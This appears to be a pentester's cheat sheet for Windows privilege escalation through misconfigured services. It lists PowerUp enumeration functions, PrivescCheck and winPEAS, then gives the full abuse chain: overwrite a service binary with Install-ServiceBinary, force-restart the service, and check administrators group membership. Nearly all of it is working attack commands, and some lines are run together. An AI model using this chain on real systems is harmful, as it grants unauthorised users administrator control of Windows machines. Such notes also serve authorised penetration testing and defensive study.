PowerUp
# Service status
Get-Service -Name 'BackupMonitor'
# Start/Stop the service
Start-Service -Name "<ServiceName>"
Stop-Service -Name "<ServiceName>" -Force
# Restart the service
Restart-Service -Name 'BackupMonitor' -ForceInvoke-AllCheckshelp invoke-serviceabuse -examples# PrivescCheck
Invoke-PrivEscCheck
# PEASS-ng
winPEASx64.exe -all# Services that user can modify their binary path or change args to the binary
Get-ModifiableServiceFile
# Service that user can modify their configurations
Get-ModifiableService
# Abuse the enumerate service
Install-ServiceBinary -Name 'mysql'
# Restart the service
Restart-Service -Name 'mysqld' -Force
# Confirm that it worked
> net localgroup administratorsLast updated